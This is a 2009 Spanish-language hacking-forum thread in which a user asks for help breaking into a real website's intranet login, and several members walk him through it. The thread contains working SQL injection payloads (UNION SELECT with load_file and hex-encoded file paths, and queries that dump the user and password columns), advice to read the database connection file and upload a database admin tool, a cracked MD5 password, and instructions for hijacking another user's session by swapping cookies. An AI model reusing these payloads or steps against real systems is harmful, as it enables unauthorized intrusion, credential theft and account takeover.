Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: Wifox en 7 Julio 2009, 01:11 am


Título: Ayuda Mmm...
Publicado por: Wifox en 7 Julio 2009, 01:11 am
Estaba intenta ingresar una web solo por el afan de aprender xD

Me ayude con un video de youtube...

Pero al cargar el archivo intranetapp/admin/index.php por medio de load_file(...

me manda lo siguiente

Código:
// Carga el archivo de definiciones
include_once ('_conexion.php');
$error = "";
setcookie("s_usuarioyo[un]");

if (isset($_POST["user"])){
$query = "select * from usuarios where usuario = '$_POST[user]'";
$result = mysql_query($query, $link);
if (mysql_num_rows($result) == 0) {
$error = "El Usuario No Existe"; }
else {
$rs = mysql_fetch_array($result);
if ($rs["clave"] != md5($HTTP_POST_VARS["pass"])) {
$error = "Password Incorrecto"; }
else {
if ($rs[estado] == '0') {
$error = "Usuario Desactivado"; }
else {
$sql2 = "SELECT max(codigo) as maximo from auditoria";
$results = mysql_query($sql2,$link);
$rs2 = mysql_fetch_array($results);
$nucod=$rs2[maximo]+1;
$nucod=str_pad($nucod,4,"0",STR_PAD_LEFT);
$fechasesion=date("Y/m/d");
$horainicio=date("h:i:s");
$sql2 = "insert into auditoria (codigo,usuario,fecha_sesion,hora_inicio) values ('$nucod','$HTTP_POST_VARS[user]','$fechasesion','$horainicio')";
mysql_query($sql2,$link);

session_start();
setcookie('s_usuarioyo[un]', $HTTP_POST_VARS["user"]);
setcookie('s_usuarioyo[ut]', $rs[tipousuario]);
setcookie('s_usuarioyo[nc]', $nucod);
if ($rs[tipousuario] == 'o') {
header("Location:padron.php");}
else {
header("Location:padron.php");}
}

}
}
}

if ($_GET[salir]!=""){

$horafin=date("h:i:s");
$sql2 = "update auditoria set hora_fin='$horafin' where codigo='$_GET[salir]'";
mysql_query($sql2,$link);

}

?>

se que la tabla de usuario es usuario xd pero la password nose

entonces si me pudieran ayudar xd

Pd: union select 1,2,3,4,load_file(0x433a2f77616d702f7777772f68746d6c312f6172636869766f732f696e7472616e65746170702f61646d696e2f696e6465782e706870),6,7,8,9,0/*

Título: Re: Ayuda Mmm...
Publicado por: Azielito en 7 Julio 2009, 19:01 pm
Ya tienes como cargar archivos, carga ahora "_conexion.php"
Código:
433a2f77616d702f7777772f68746d6c312f6172636869766f732f696e7472616e65746170702f61646d696e2f5f636f6e6578696f6e2e706870

Para ver usuario y contraseña de la base de datos, y luego intenta conectarte a la base de datos via remoto, si no se puede intenta subir el phpminiadmin para entrar a la base de datos '_'

Título: Re: Ayuda Mmm...
Publicado por: WHK en 7 Julio 2009, 19:42 pm
union select 1,2,3,4,usuario,clave,7,8,9,0 from basededatos.usuarios /*
donde basededatos es el nombre de la base de datos que sacas con
union select 1,2,3,4,database(),6,7,8,9,0 /*

Si te limita a una sola columna le vas dando limit 1 y vas seleccionando user por user

Título: Re: Ayuda Mmm...
Publicado por: 08l00D en 7 Julio 2009, 20:04 pm
Citar
se que la tabla de usuario es usuario xd pero la password nose
La tabla de usuarios es usuarios no usuario.. usuario es el nombre de la columna igual que clave...
WHK ya te dio la inyeccion completa asi que lo unico te toca sacar el username y la password en md5...

solo una cosa si tienes varios usuarios admin, y quieres ir viendo todos en ves de limit podes usar group_concat(usuario,0x3a,clave) ...

Saludos..

Título: Re: Ayuda Mmm...
Publicado por: Wifox en 9 Julio 2009, 02:49 am
Cita de: WHK en  7 Julio 2009, 19:42 pm
union select 1,2,3,4,usuario,clave,7,8,9,0 from basededatos.usuarios /*
donde basededatos es el nombre de la base de datos que sacas con
union select 1,2,3,4,database(),6,7,8,9,0 /*

Si te limita a una sola columna le vas dando limit 1 y vas seleccionando user por user
;D see me resulto pero hay un problema, creo que me manda la clave md5  :-\

a95238df9190e26ce56f7f95bc51d229

el usuario no tiene problemas, no saben de un crack de md5?

Título: Re: Ayuda Mmm...
Publicado por: Wifox en 9 Julio 2009, 03:44 am
vengo denuevo xd

la password era "holitas" pero cunado la probe me decia usuario desactivado :¬¬

entonces no se puede? :huh:

Título: Re: Ayuda Mmm...
Publicado por: WHK en 9 Julio 2009, 09:41 am
entra como un usuario normal y cheka tus cookies, reemplaza tu pass normal por el pass del otro usuario, no necesitas crackear nada..
por ejemplo si tu cookie es:

id:1:pass:hgfdf5465df465df4g86f

entonces sacas los datos de la otra persona y reemplazas tus datos por los de el y ya, refrescas el navegador y ya tomaste poder de su sesión.


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines